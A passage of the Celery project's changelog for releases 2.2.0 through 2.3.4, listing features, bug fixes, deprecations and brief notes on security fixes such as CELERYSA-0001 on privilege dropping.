    https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0001.txt

.. _version-2.2.7:

2.2.7
=====
:release-date: 2011-06-13 04:00 p.m. BST
:release-by: Ask Solem

* New signals: :signal:`after_setup_logger` and
  :signal:`after_setup_task_logger`.

  These signals can be used to augment logging configuration after Celery
  has set up logging.

* Redis result backend now works with Redis 2.4.4.

* multi: The :option:`--gid` option now works correctly.

* worker: Retry wrongfully used the repr of the traceback instead of the
  string representation.

* App.config_from_object: Now loads the module, not an attribute of the
  module.

* Fixed issue where logging of objects would give "<Unrepresentable: ...>".

.. _version-2.2.6:

2.2.6
=====
:release-date: 2011-04-15 04:00 p.m. CEST
:release-by: Ask Solem

.. _v226-important:

Important Notes
---------------

* Now depends on :pypi:`Kombu` 1.1.2.

* Dependency lists now explicitly specify that we don't want
  :pypi:`python-dateutil` 2.x, as this version only supports Python 3.

  If you have installed dateutil 2.0 by accident you should downgrade
  to the 1.5.0 version:

  .. code-block:: console

      $ pip install -U python-dateutil==1.5.0

  or by ``easy_install``:

  .. code-block:: console

      $ easy_install -U python-dateutil==1.5.0

..
_v226-fixes: Fixes ----- * The new ``WatchedFileHandler`` broke Python 2.5 support (Issue #367). * Task: Don't use ``app.main`` if the task name is set explicitly. * Sending emails didn't work on Python 2.5, due to a bug in the version detection code (Issue #378). * Beat: Adds method ``ScheduleEntry._default_now`` This method can be overridden to change the default value of ``last_run_at``. * An error occurring in process cleanup could mask task errors. We no longer propagate errors happening at process cleanup, but log them instead. This way they won't interfere with publishing the task result (Issue #365). * Defining tasks didn't work properly when using the Django ``shell_plus`` utility (Issue #366). * ``AsyncResult.get`` didn't accept the ``interval`` and ``propagate`` arguments. * worker: Fixed a bug where the worker wouldn't shutdown if a :exc:`socket.error` was raised. .. _version-2.2.5: 2.2.5 ===== :release-date: 2011-03-28 06:00 p.m. CEST :release-by: Ask Solem .. _v225-important: Important Notes --------------- * Now depends on Kombu 1.0.7 .. _v225-news: News ---- * Our documentation is now hosted by Read The Docs (http://docs.celeryproject.org), and all links have been changed to point to the new URL. * Logging: Now supports log rotation using external tools like `logrotate.d`_ (Issue #321) This is accomplished by using the ``WatchedFileHandler``, which re-opens the file if it's renamed or deleted. .. _`logrotate.d`: http://www.ducea.com/2006/06/06/rotating-linux-log-files-part-2-logrotate/ * ``otherqueues`` tutorial now documents how to configure Redis/Database result backends. * gevent: Now supports ETA tasks. But gevent still needs ``CELERY_DISABLE_RATE_LIMITS=True`` to work. * TaskSet User Guide: now contains TaskSet callback recipes. * Eventlet: New signals: * ``eventlet_pool_started`` * ``eventlet_pool_preshutdown`` * ``eventlet_pool_postshutdown`` * ``eventlet_pool_apply`` See :mod:`celery.signals` for more information. * New :setting:`BROKER_TRANSPORT_OPTIONS` setting can be used to pass additional arguments to a particular broker transport. * worker: ``worker_pid`` is now part of the request info as returned by broadcast commands. * TaskSet.apply/Taskset.apply_async now accepts an optional ``taskset_id`` argument. * The taskset_id (if any) is now available in the Task request context. * SQLAlchemy result backend: taskset_id and taskset_id columns now have a unique constraint (tables need to recreated for this to take affect). * Task user guide: Added section about choosing a result backend. * Removed unused attribute ``AsyncResult.uuid``. .. _v225-fixes: Fixes ----- * multiprocessing.Pool: Fixes race condition when marking job with ``WorkerLostError`` (Issue #268). The process may have published a result before it was terminated, but we have no reliable way to detect that this is the case. So we have to wait for 10 seconds before marking the result with WorkerLostError. This gives the result handler a chance to retrieve the result. * multiprocessing.Pool: Shutdown could hang if rate limits disabled. There was a race condition when the MainThread was waiting for the pool semaphore to be released. The ResultHandler now terminates after 5 seconds if there are unacked jobs, but no worker processes left to start them (it needs to timeout because there could still be an ack+result that we haven't consumed from the result queue. It is unlikely we'll receive any after 5 seconds with no worker processes). 
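Going back to the :setting:`BROKER_TRANSPORT_OPTIONS` setting introduced in the 2.2.5 news above: it's a plain dictionary that's handed to the broker transport. A minimal sketch; the ``visibility_timeout`` key shown is a Redis-transport option from later Celery/Kombu releases and is used here purely as an illustration of a transport-specific key:

.. code-block:: python

    # Passed verbatim to the broker transport; which keys are honored
    # depends on the transport in use.
    BROKER_TRANSPORT_OPTIONS = {'visibility_timeout': 3600}  # seconds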
* ``celerybeat``: Now creates pidfile even if the ``--detach`` option isn't set. * eventlet/gevent: The broadcast command consumer is now running in a separate green-thread. This ensures broadcast commands will take priority even if there are many active tasks. * Internal module ``celery.worker.controllers`` renamed to ``celery.worker.mediator``. * worker: Threads now terminates the program by calling ``os._exit``, as it is the only way to ensure exit in the case of syntax errors, or other unrecoverable errors. * Fixed typo in ``maybe_timedelta`` (Issue #352). * worker: Broadcast commands now logs with loglevel debug instead of warning. * AMQP Result Backend: Now resets cached channel if the connection is lost. * Polling results with the AMQP result backend wasn't working properly. * Rate limits: No longer sleeps if there are no tasks, but rather waits for the task received condition (Performance improvement). * ConfigurationView: ``iter(dict)`` should return keys, not items (Issue #362). * ``celerybeat``: PersistentScheduler now automatically removes a corrupted schedule file (Issue #346). * Programs that doesn't support positional command-line arguments now provides a user friendly error message. * Programs no longer tries to load the configuration file when showing ``--version`` (Issue #347). * Autoscaler: The "all processes busy" log message is now severity debug instead of error. * worker: If the message body can't be decoded, it's now passed through ``safe_str`` when logging. This to ensure we don't get additional decoding errors when trying to log the failure. * ``app.config_from_object``/``app.config_from_envvar`` now works for all loaders. * Now emits a user-friendly error message if the result backend name is unknown (Issue #349). * ``celery.contrib.batches``: Now sets loglevel and logfile in the task request so ``task.get_logger`` works with batch tasks (Issue #357). * worker: An exception was raised if using the amqp transport and the prefetch count value exceeded 65535 (Issue #359). The prefetch count is incremented for every received task with an ETA/countdown defined. The prefetch count is a short, so can only support a maximum value of 65535. If the value exceeds the maximum value we now disable the prefetch count, it's re-enabled as soon as the value is below the limit again. * ``cursesmon``: Fixed unbound local error (Issue #303). * eventlet/gevent is now imported on demand so autodoc can import the modules without having eventlet/gevent installed. * worker: Ack callback now properly handles ``AttributeError``. * ``Task.after_return`` is now always called *after* the result has been written. * Cassandra Result Backend: Should now work with the latest ``pycassa`` version. * multiprocessing.Pool: No longer cares if the ``putlock`` semaphore is released too many times (this can happen if one or more worker processes are killed). * SQLAlchemy Result Backend: Now returns accidentally removed ``date_done`` again (Issue #325). * Task.request context is now always initialized to ensure calling the task function directly works even if it actively uses the request context. * Exception occurring when iterating over the result from ``TaskSet.apply`` fixed. * eventlet: Now properly schedules tasks with an ETA in the past. .. _version-2.2.4: 2.2.4 ===== :release-date: 2011-02-19 00:00 AM CET :release-by: Ask Solem .. _v224-fixes: Fixes ----- * worker: 2.2.3 broke error logging, resulting in tracebacks not being logged. 
* AMQP result backend: Polling task states didn't work properly if there were more than one result message in the queue. * ``TaskSet.apply_async()`` and ``TaskSet.apply()`` now supports an optional ``taskset_id`` keyword argument (Issue #331). * The current taskset id (if any) is now available in the task context as ``request.taskset`` (Issue #329). * SQLAlchemy result backend: `date_done` was no longer part of the results as it had been accidentally removed. It's now available again (Issue #325). * SQLAlchemy result backend: Added unique constraint on `Task.id` and `TaskSet.taskset_id`. Tables needs to be recreated for this to take effect. * Fixed exception raised when iterating on the result of ``TaskSet.apply()``. * Tasks user guide: Added section on choosing a result backend. .. _version-2.2.3: 2.2.3 ===== :release-date: 2011-02-12 04:00 p.m. CET :release-by: Ask Solem .. _v223-fixes: Fixes ----- * Now depends on :pypi:`Kombu` 1.0.3 * Task.retry now supports a ``max_retries`` argument, used to change the default value. * `multiprocessing.cpu_count` may raise :exc:`NotImplementedError` on platforms where this isn't supported (Issue #320). * Coloring of log messages broke if the logged object wasn't a string. * Fixed several typos in the init-script documentation. * A regression caused `Task.exchange` and `Task.routing_key` to no longer have any effect. This is now fixed. * Routing user guide: Fixes typo, routers in :setting:`CELERY_ROUTES` must be instances, not classes. * :program:`celeryev` didn't create pidfile even though the :option:`--pidfile ` argument was set. * Task logger format was no longer used (Issue #317). The id and name of the task is now part of the log message again. * A safe version of ``repr()`` is now used in strategic places to ensure objects with a broken ``__repr__`` doesn't crash the worker, or otherwise make errors hard to understand (Issue #298). * Remote control command :control:`active_queues`: didn't account for queues added at runtime. In addition the dictionary replied by this command now has a different structure: the exchange key is now a dictionary containing the exchange declaration in full. * The :option:`celery worker -Q` option removed unused queue declarations, so routing of tasks could fail. Queues are no longer removed, but rather `app.amqp.queues.consume_from()` is used as the list of queues to consume from. This ensures all queues are available for routing purposes. * ``celeryctl``: Now supports the `inspect active_queues` command. .. _version-2.2.2: 2.2.2 ===== :release-date: 2011-02-03 04:00 p.m. CET :release-by: Ask Solem .. _v222-fixes: Fixes ----- * ``celerybeat`` couldn't read the schedule properly, so entries in :setting:`CELERYBEAT_SCHEDULE` wouldn't be scheduled. * Task error log message now includes `exc_info` again. * The `eta` argument can now be used with `task.retry`. Previously it was overwritten by the countdown argument. * ``celery multi``/``celeryd_detach``: Now logs errors occurring when executing the `celery worker` command. * daemonizing tutorial: Fixed typo ``--time-limit 300`` -> ``--time-limit=300`` * Colors in logging broke non-string objects in log messages. * ``setup_task_logger`` no longer makes assumptions about magic task kwargs. .. _version-2.2.1: 2.2.1 ===== :release-date: 2011-02-02 04:00 p.m. CET :release-by: Ask Solem .. _v221-fixes: Fixes ----- * Eventlet pool was leaking memory (Issue #308). * Deprecated function ``celery.execute.delay_task`` was accidentally removed, now available again. 
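To illustrate the `task.retry` changes noted above (the ``max_retries`` argument from 2.2.3 and the ``eta`` argument from 2.2.2), here's a minimal sketch; the ``fetch_feed`` task, the ``download`` helper, and ``TemporaryError`` are hypothetical:

.. code-block:: python

    from datetime import datetime, timedelta

    from celery.task import task

    @task()
    def fetch_feed(url):
        try:
            return download(url)          # hypothetical helper
        except TemporaryError as exc:     # hypothetical exception type
            # Retry in 60 seconds and override the configured retry limit.
            return fetch_feed.retry(exc=exc, countdown=60, max_retries=5)
            # ... or schedule the retry with an absolute ETA instead:
            # return fetch_feed.retry(
            #     exc=exc, eta=datetime.now() + timedelta(minutes=1))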
* ``BasePool.on_terminate`` stub didn't exist * ``celeryd_detach``: Adds readable error messages if user/group name doesn't exist. * Smarter handling of unicode decode errors when logging errors. .. _version-2.2.0: 2.2.0 ===== :release-date: 2011-02-01 10:00 AM CET :release-by: Ask Solem .. _v220-important: Important Notes --------------- * Carrot has been replaced with :pypi:`Kombu` Kombu is the next generation messaging library for Python, fixing several flaws present in Carrot that was hard to fix without breaking backwards compatibility. Also it adds: * First-class support for virtual transports; Redis, Django ORM, SQLAlchemy, Beanstalk, MongoDB, CouchDB and in-memory. * Consistent error handling with introspection, * The ability to ensure that an operation is performed by gracefully handling connection and channel errors, * Message compression (:mod:`zlib`, :mod:`bz2`, or custom compression schemes). This means that `ghettoq` is no longer needed as the functionality it provided is already available in Celery by default. The virtual transports are also more feature complete with support for exchanges (direct and topic). The Redis transport even supports fanout exchanges so it's able to perform worker remote control commands. * Magic keyword arguments pending deprecation. The magic keyword arguments were responsible for many problems and quirks: notably issues with tasks and decorators, and name collisions in keyword arguments for the unaware. It wasn't easy to find a way to deprecate the magic keyword arguments, but we think this is a solution that makes sense and it won't have any adverse effects for existing code. The path to a magic keyword argument free world is: * the `celery.decorators` module is deprecated and the decorators can now be found in `celery.task`. * The decorators in `celery.task` disables keyword arguments by default * All examples in the documentation have been changed to use `celery.task`. This means that the following will have magic keyword arguments enabled (old style): .. code-block:: python from celery.decorators import task @task() def add(x, y, **kwargs): print('In task %s' % kwargs['task_id']) return x + y And this won't use magic keyword arguments (new style): .. code-block:: python from celery.task import task @task() def add(x, y): print('In task %s' % add.request.id) return x + y In addition, tasks can choose not to accept magic keyword arguments by setting the `task.accept_magic_kwargs` attribute. .. admonition:: Deprecation Using the decorators in :mod:`celery.decorators` emits a :class:`PendingDeprecationWarning` with a helpful message urging you to change your code, in version 2.4 this will be replaced with a :class:`DeprecationWarning`, and in version 4.0 the :mod:`celery.decorators` module will be removed and no longer exist. Similarly, the `task.accept_magic_kwargs` attribute will no longer have any effect starting from version 4.0. * The magic keyword arguments are now available as `task.request` This is called *the context*. Using thread-local storage the context contains state that's related to the current request. It's mutable and you can add custom attributes that'll only be seen by the current task request. 
The following context attributes are always available: ===================================== =================================== **Magic Keyword Argument** **Replace with** ===================================== =================================== `kwargs['task_id']` `self.request.id` `kwargs['delivery_info']` `self.request.delivery_info` `kwargs['task_retries']` `self.request.retries` `kwargs['logfile']` `self.request.logfile` `kwargs['loglevel']` `self.request.loglevel` `kwargs['task_is_eager']` `self.request.is_eager` **NEW** `self.request.args` **NEW** `self.request.kwargs` ===================================== =================================== In addition, the following methods now automatically uses the current context, so you don't have to pass `kwargs` manually anymore: * `task.retry` * `task.get_logger` * `task.update_state` * `Eventlet`_ support. This is great news for I/O-bound tasks! To change pool implementations you use the :option:`celery worker --pool` argument, or globally using the :setting:`CELERYD_POOL` setting. This can be the full name of a class, or one of the following aliases: `processes`, `eventlet`, `gevent`. For more information please see the :ref:`concurrency-eventlet` section in the User Guide. .. admonition:: Why not gevent? For our first alternative concurrency implementation we've focused on `Eventlet`_, but there's also an experimental `gevent`_ pool available. This is missing some features, notably the ability to schedule ETA tasks. Hopefully the `gevent`_ support will be feature complete by version 2.3, but this depends on user demand (and contributions). .. _`Eventlet`: http://eventlet.net .. _`gevent`: http://gevent.org * Python 2.4 support deprecated! We're happy^H^H^H^H^Hsad to announce that this is the last version to support Python 2.4. You're urged to make some noise if you're currently stuck with Python 2.4. Complain to your package maintainers, sysadmins and bosses: tell them it's time to move on! Apart from wanting to take advantage of :keyword:`with` statements, coroutines, conditional expressions and enhanced :keyword:`try` blocks, the code base now contains so many 2.4 related hacks and workarounds it's no longer just a compromise, but a sacrifice. If it really isn't your choice, and you don't have the option to upgrade to a newer version of Python, you can just continue to use Celery 2.2. Important fixes can be back ported for as long as there's interest. * worker: Now supports Autoscaling of child worker processes. The :option:`--autoscale ` option can be used to configure the minimum and maximum number of child worker processes: .. code-block:: text --autoscale=AUTOSCALE Enable autoscaling by providing max_concurrency,min_concurrency. Example: --autoscale=10,3 (always keep 3 processes, but grow to 10 if necessary). * Remote Debugging of Tasks ``celery.contrib.rdb`` is an extended version of :mod:`pdb` that enables remote debugging of processes that doesn't have terminal access. Example usage: .. code-block:: text from celery.contrib import rdb from celery.task import task @task() def add(x, y): result = x + y # set breakpoint rdb.set_trace() return result :func:`~celery.contrib.rdb.set_trace` sets a breakpoint at the current location and creates a socket you can telnet into to remotely debug your task. The debugger may be started by multiple processes at the same time, so rather than using a fixed port the debugger will search for an available port, starting from the base port (6900 by default). 
The base port can be changed using the environment variable :envvar:`CELERY_RDB_PORT`. By default the debugger will only be available from the local host, to enable access from the outside you have to set the environment variable :envvar:`CELERY_RDB_HOST`. When the worker encounters your breakpoint it will log the following information:: [INFO/MainProcess] Received task: tasks.add[d7261c71-4962-47e5-b342-2448bedd20e8] [WARNING/PoolWorker-1] Remote Debugger:6900: Please telnet 127.0.0.1 6900. Type `exit` in session to continue. [2011-01-18 14:25:44,119: WARNING/PoolWorker-1] Remote Debugger:6900: Waiting for client... If you telnet the port specified you'll be presented with a ``pdb`` shell: .. code-block:: console $ telnet localhost 6900 Connected to localhost. Escape character is '^]'. > /opt/devel/demoapp/tasks.py(128)add() -> return result (Pdb) Enter ``help`` to get a list of available commands, It may be a good idea to read the `Python Debugger Manual`_ if you have never used `pdb` before. .. _`Python Debugger Manual`: http://docs.python.org/library/pdb.html * Events are now transient and is using a topic exchange (instead of direct). The `CELERYD_EVENT_EXCHANGE`, `CELERYD_EVENT_ROUTING_KEY`, `CELERYD_EVENT_EXCHANGE_TYPE` settings are no longer in use. This means events won't be stored until there's a consumer, and the events will be gone as soon as the consumer stops. Also it means there can be multiple monitors running at the same time. The routing key of an event is the type of event (e.g., `worker.started`, `worker.heartbeat`, `task.succeeded`, etc. This means a consumer can filter on specific types, to only be alerted of the events it cares about. Each consumer will create a unique queue, meaning it's in effect a broadcast exchange. This opens up a lot of possibilities, for example the workers could listen for worker events to know what workers are in the neighborhood, and even restart workers when they go down (or use this information to optimize tasks/autoscaling). .. note:: The event exchange has been renamed from ``"celeryevent"`` to ``"celeryev"`` so it doesn't collide with older versions. If you'd like to remove the old exchange you can do so by executing the following command: .. code-block:: console $ camqadm exchange.delete celeryevent * The worker now starts without configuration, and configuration can be specified directly on the command-line. Configuration options must appear after the last argument, separated by two dashes: .. code-block:: console $ celery worker -l info -I tasks -- broker.host=localhost broker.vhost=/app * Configuration is now an alias to the original configuration, so changes to the original will reflect Celery at runtime. * `celery.conf` has been deprecated, and modifying `celery.conf.ALWAYS_EAGER` will no longer have any effect. The default configuration is now available in the :mod:`celery.app.defaults` module. The available configuration options and their types can now be introspected. * Remote control commands are now provided by `kombu.pidbox`, the generic process mailbox. * Internal module `celery.worker.listener` has been renamed to `celery.worker.consumer`, and `.CarrotListener` is now `.Consumer`. * Previously deprecated modules `celery.models` and `celery.management.commands` have now been removed as per the deprecation time-line. * [Security: Low severity] Removed `celery.task.RemoteExecuteTask` and accompanying functions: `dmap`, `dmap_async`, and `execute_remote`. 
Executing arbitrary code using pickle is a potential security issue if someone gains unrestricted access to the message broker. If you really need this functionality, then you'd've to add this to your own project. * [Security: Low severity] The `stats` command no longer transmits the broker password. One would've needed an authenticated broker connection to receive this password in the first place, but sniffing the password at the wire level would've been possible if using unencrypted communication. .. _v220-news: News ---- * The internal module `celery.task.builtins` has been removed. * The module `celery.task.schedules` is deprecated, and `celery.schedules` should be used instead. For example if you have:: from celery.task.schedules import crontab You should replace that with:: from celery.schedules import crontab The module needs to be renamed because it must be possible to import schedules without importing the `celery.task` module. * The following functions have been deprecated and is scheduled for removal in version 2.3: * `celery.execute.apply_async` Use `task.apply_async()` instead. * `celery.execute.apply` Use `task.apply()` instead. * `celery.execute.delay_task` Use `registry.tasks[name].delay()` instead. * Importing `TaskSet` from `celery.task.base` is now deprecated. You should use:: >>> from celery.task import TaskSet instead. * New remote control commands: * `active_queues` Returns the queue declarations a worker is currently consuming from. * Added the ability to retry publishing the task message in the event of connection loss or failure. This is disabled by default but can be enabled using the :setting:`CELERY_TASK_PUBLISH_RETRY` setting, and tweaked by the :setting:`CELERY_TASK_PUBLISH_RETRY_POLICY` setting. In addition `retry`, and `retry_policy` keyword arguments have been added to `Task.apply_async`. .. note:: Using the `retry` argument to `apply_async` requires you to handle the publisher/connection manually. * Periodic Task classes (`@periodic_task`/`PeriodicTask`) will *not* be deprecated as previously indicated in the source code. But you're encouraged to use the more flexible :setting:`CELERYBEAT_SCHEDULE` setting. * Built-in daemonization support of the worker using `celery multi` is no longer experimental and is considered production quality. See :ref:`daemon-generic` if you want to use the new generic init scripts. * Added support for message compression using the :setting:`CELERY_MESSAGE_COMPRESSION` setting, or the `compression` argument to `apply_async`. This can also be set using routers. * worker: Now logs stack-trace of all threads when receiving the `SIGUSR1` signal (doesn't work on CPython 2.4, Windows or Jython). Inspired by https://gist.github.com/737056 * Can now remotely terminate/kill the worker process currently processing a task. The `revoke` remote control command now supports a `terminate` argument Default signal is `TERM`, but can be specified using the `signal` argument. Signal can be the uppercase name of any signal defined in the :mod:`signal` module in the Python Standard Library. Terminating a task also revokes it. Example:: >>> from celery.task.control import revoke >>> revoke(task_id, terminate=True) >>> revoke(task_id, terminate=True, signal='KILL') >>> revoke(task_id, terminate=True, signal='SIGKILL') * `TaskSetResult.join_native`: Backend-optimized version of `join()`. If available, this version uses the backends ability to retrieve multiple results at once, unlike `join()` which fetches the results one by one. 
So far only supported by the AMQP result backend. Support for Memcached and Redis may be added later. * Improved implementations of `TaskSetResult.join` and `AsyncResult.wait`. An `interval` keyword argument have been added to both so the polling interval can be specified (default interval is 0.5 seconds). A `propagate` keyword argument have been added to `result.wait()`, errors will be returned instead of raised if this is set to False. .. warning:: You should decrease the polling interval when using the database result backend, as frequent polling can result in high database load. * The PID of the child worker process accepting a task is now sent as a field with the :event:`task-started` event. * The following fields have been added to all events in the worker class: * `sw_ident`: Name of worker software (e.g., ``"py-celery"``). * `sw_ver`: Software version (e.g., 2.2.0). * `sw_sys`: Operating System (e.g., Linux, Windows, Darwin). * For better accuracy the start time reported by the multiprocessing worker process is used when calculating task duration. Previously the time reported by the accept callback was used. * `celerybeat`: New built-in daemonization support using the `--detach` option. * `celeryev`: New built-in daemonization support using the `--detach` option. * `TaskSet.apply_async`: Now supports custom publishers by using the `publisher` argument. * Added :setting:`CELERY_SEND_TASK_SENT_EVENT` setting. If enabled an event will be sent with every task, so monitors can track tasks before the workers receive them. * `celerybeat`: Now reuses the broker connection when calling scheduled tasks. * The configuration module and loader to use can now be specified on the command-line. For example: .. code-block:: console $ celery worker --config=celeryconfig.py --loader=myloader.Loader * Added signals: `beat_init` and `beat_embedded_init` * :signal:`celery.signals.beat_init` Dispatched when :program:`celerybeat` starts (either standalone or embedded). Sender is the :class:`celery.beat.Service` instance. * :signal:`celery.signals.beat_embedded_init` Dispatched in addition to the :signal:`beat_init` signal when :program:`celerybeat` is started as an embedded process. Sender is the :class:`celery.beat.Service` instance. * Redis result backend: Removed deprecated settings `REDIS_TIMEOUT` and `REDIS_CONNECT_RETRY`. * CentOS init-script for :program:`celery worker` now available in `extra/centos`. * Now depends on :pypi:`pyparsing` version 1.5.0 or higher. There have been reported issues using Celery with :pypi:`pyparsing` 1.4.x, so please upgrade to the latest version. * Lots of new unit tests written, now with a total coverage of 95%. .. _v220-fixes: Fixes ----- * `celeryev` Curses Monitor: Improved resize handling and UI layout (Issue #274 + Issue #276) * AMQP Backend: Exceptions occurring while sending task results are now propagated instead of silenced. the worker will then show the full traceback of these errors in the log. * AMQP Backend: No longer deletes the result queue after successful poll, as this should be handled by the :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` setting instead. * AMQP Backend: Now ensures queues are declared before polling results. * Windows: worker: Show error if running with `-B` option. Running ``celerybeat`` embedded is known not to work on Windows, so users are encouraged to run ``celerybeat`` as a separate service instead. 
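As a rough illustration of the setup recommended above, a minimal sketch of running the worker and the beat scheduler as two separate processes on Windows (program names as shipped in this release series; any service wrapper is up to you):

.. code-block:: console

    $ celeryd --loglevel=INFO
    $ celerybeat --loglevel=INFO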
* Windows: Utilities no longer output ANSI color codes on Windows. * ``camqadm``: Now properly handles :kbd:`Control-c` by simply exiting instead of showing a confusing traceback. * Windows: All tests are now passing on Windows. * Removed the bin/ directory and the `scripts` section from :file:`setup.py`. This means we now rely completely on setuptools entry-points. .. _v220-experimental: Experimental ------------ * Jython: worker now runs on Jython using the threaded pool. All tests pass, but there may still be bugs lurking around the corners. * PyPy: worker now runs on PyPy. It runs without any pool, so to get parallel execution you must start multiple instances (e.g., using :program:`multi`). Sadly an initial benchmark seems to show a 30% performance decrease on ``pypy-1.4.1`` + JIT. We would like to find out why this is, so stay tuned. * :class:`PublisherPool`: Experimental pool of task publishers and connections to be used with the `retry` argument to `apply_async`. The example code below will re-use connections and channels, and retry sending of the task message if the connection is lost. .. code-block:: python from celery import current_app # Global pool pool = current_app().amqp.PublisherPool(limit=10) def my_view(request): with pool.acquire() as publisher: add.apply_async((2, 2), publisher=publisher, retry=True) .. _changelog-2.3: =============================== Change history for Celery 2.3 =============================== .. contents:: :local: .. _version-2.3.4: 2.3.4 ===== :release-date: 2011-11-25 04:00 p.m. GMT :release-by: Ask Solem .. _v234-security-fixes: Security Fixes -------------- * [Security: `CELERYSA-0001`_] Daemons would set effective id's rather than real id's when the :option:`--uid `/ :option:`--gid ` arguments to :program:`celery multi`, :program:`celeryd_detach`, :program:`celery beat` and :program:`celery events` were used. This means privileges weren't properly dropped, and that it would be possible to regain supervisor privileges later. .. _`CELERYSA-0001`: https://github.com/celery/celery/tree/master/docs/sec/CELERYSA-0001.txt Fixes ----- * Backported fix for #455 from 2.4 to 2.3. * StateDB wasn't saved at shutdown. * Fixes worker sometimes hanging when hard time limit exceeded. .. _version-2.3.3: 2.3.3 ===== :release-date: 2011-09-16 05:00 p.m. BST :release-by: Mher Movsisyan * Monkey patching :attr:`sys.stdout` could result in the worker crashing if the replacing object didn't define :meth:`isatty` (Issue #477). * ``CELERYD`` option in :file:`/etc/default/celeryd` shouldn't be used with generic init-scripts. .. _version-2.3.2: 2.3.2 ===== :release-date: 2011-10-07 05:00 p.m. BST :release-by: Ask Solem .. _v232-news: News ---- * Improved Contributing guide. If you'd like to contribute to Celery you should read the :ref:`Contributing Guide `. We're looking for contributors at all skill levels, so don't hesitate! * Now depends on Kombu 1.3.1. * ``Task.request`` now contains the current worker host name (Issue #460). Available as ``task.request.hostname``. * It's now easier for app subclasses to extend how they're pickled (see :class:`celery.app.AppPickler`). .. _v232-fixes: Fixes ----- * `purge/discard_all` wasn't working correctly (Issue #455). * The coloring of log messages didn't handle non-ASCII data well (Issue #427).
* [Windows] the multiprocessing pool tried to import ``os.kill`` even though this isn't available there (Issue #450). * Fixes case where the worker could become unresponsive because of tasks exceeding the hard time limit. * The :event:`task-sent` event was missing from the event reference. * ``ResultSet.iterate`` now returns results as they finish (Issue #459). This wasn't the case previously, even though the documentation states this was the expected behavior. * Retries will no longer be performed when tasks are called directly (using ``__call__``). Instead the exception passed to ``retry`` will be re-raised. * Eventlet no longer crashes if autoscale is enabled. growing and shrinking eventlet pools is still not supported. * ``py24`` target removed from :file:`tox.ini`. .. _version-2.3.1: 2.3.1 ===== :release-date: 2011-08-07 08:00 p.m. BST :release-by: Ask Solem Fixes ----- * The :setting:`CELERY_AMQP_TASK_RESULT_EXPIRES` setting didn't work, resulting in an AMQP related error about not being able to serialize floats while trying to publish task states (Issue #446). .. _version-2.3.0: 2.3.0 ===== :release-date: 2011-08-05 12:00 p.m. BST :tested: CPython: 2.5, 2.6, 2.7; PyPy: 1.5; Jython: 2.5.2 :release-by: Ask Solem .. _v230-important: Important Notes --------------- * Now requires Kombu 1.2.1 * Results are now disabled by default. The AMQP backend wasn't a good default because often the users were not consuming the results, resulting in thousands of queues. While the queues can be configured to expire if left unused, it wasn't possible to enable this by default because this was only available in recent RabbitMQ versions (2.1.1+) With this change enabling a result backend will be a conscious choice, which will hopefully lead the user to read the documentation and be aware of any common pitfalls with the particular backend. The default backend is now a dummy backend (:class:`celery.backends.base.DisabledBackend`). Saving state is simply an no-op, and AsyncResult.wait(), .result, .state, etc. will raise a :exc:`NotImplementedError` telling the user to configure the result backend. For help choosing a backend please see :ref:`task-result-backends`. If you depend on the previous default which was the AMQP backend, then you have to set this explicitly before upgrading:: CELERY_RESULT_BACKEND = 'amqp' .. note:: For :pypi:`django-celery` users the default backend is still ``database``, and results are not disabled by default. * The Debian init-scripts have been deprecated in favor of the generic-init.d init-scripts. In addition generic init-scripts for ``celerybeat`` and ``celeryev`` has been added. .. _v230-news: News ---- * Automatic connection pool support. The pool is used by everything that requires a broker connection, for example calling tasks, sending broadcast commands, retrieving results with the AMQP result backend, and so on. The pool is disabled by default, but you can enable it by configuring the :setting:`BROKER_POOL_LIMIT` setting:: BROKER_POOL_LIMIT = 10 A limit of 10 means a maximum of 10 simultaneous connections can co-exist. Only a single connection will ever be used in a single-thread environment, but in a concurrent environment (threads, greenlets, etc., but not processes) when the limit has been exceeded, any try to acquire a connection will block the thread and wait for a connection to be released. This is something to take into consideration when choosing a limit. A limit of :const:`None` or 0 means no limit, and connections will be established and closed every time. 
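As a concrete illustration of the pool setting described above, a minimal configuration sketch (the broker host is a placeholder; the limit of 10 mirrors the example value given above):

.. code-block:: python

    # celeryconfig.py -- enable the broker connection pool (2.3-era setting names)
    BROKER_HOST = 'localhost'   # placeholder broker location
    BROKER_POOL_LIMIT = 10      # allow at most 10 simultaneous broker connections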
* Introducing Chords (taskset callbacks). A chord is a task that only executes after all of the tasks in a taskset has finished executing. It's a fancy term for "taskset callbacks" adopted from `Cω `_). It works with all result backends, but the best implementation is currently provided by the Redis result backend. Here's an example chord:: >>> chord(add.subtask((i, i)) ... for i in xrange(100))(tsum.subtask()).get() 9900 Please read the :ref:`Chords section in the user guide `, if you want to know more. * Time limits can now be set for individual tasks. To set the soft and hard time limits for a task use the ``time_limit`` and ``soft_time_limit`` attributes: .. code-block:: python import time @task(time_limit=60, soft_time_limit=30) def sleeptask(seconds): time.sleep(seconds) If the attributes are not set, then the workers default time limits will be used. New in this version you can also change the time limits for a task at runtime using the :func:`time_limit` remote control command:: >>> from celery.task import control >>> control.time_limit('tasks.sleeptask', ... soft=60, hard=120, reply=True) [{'worker1.example.com': {'ok': 'time limits set successfully'}}] Only tasks that starts executing after the time limit change will be affected. .. note:: Soft time limits will still not work on Windows or other platforms that don't have the ``SIGUSR1`` signal. * Redis backend configuration directive names changed to include the ``CELERY_`` prefix. ===================================== =================================== **Old setting name** **Replace with** ===================================== =================================== `REDIS_HOST` `CELERY_REDIS_HOST` `REDIS_PORT` `CELERY_REDIS_PORT` `REDIS_DB` `CELERY_REDIS_DB` `REDIS_PASSWORD` `CELERY_REDIS_PASSWORD` ===================================== =================================== The old names are still supported but pending deprecation. * PyPy: The default pool implementation used is now multiprocessing if running on PyPy 1.5. * multi: now supports "pass through" options. Pass through options makes it easier to use Celery without a configuration file, or just add last-minute options on the command line. Example use: .. code-block:: console $ celery multi start 4 -c 2 -- broker.host=amqp.example.com \ broker.vhost=/ \ celery.disable_rate_limits=yes * ``celerybeat``: Now retries establishing the connection (Issue #419). * ``celeryctl``: New ``list bindings`` command. Lists the current or all available bindings, depending on the broker transport used. * Heartbeat is now sent every 30 seconds (previously every 2 minutes). * ``ResultSet.join_native()`` and ``iter_native()`` is now supported by the Redis and Cache result backends. This is an optimized version of ``join()`` using the underlying backends ability to fetch multiple results at once. * Can now use SSL when sending error e-mails by enabling the :setting:`EMAIL_USE_SSL` setting. * ``events.default_dispatcher()``: Context manager to easily obtain an event dispatcher instance using the connection pool. * Import errors in the configuration module won't be silenced anymore. * ResultSet.iterate: Now supports the 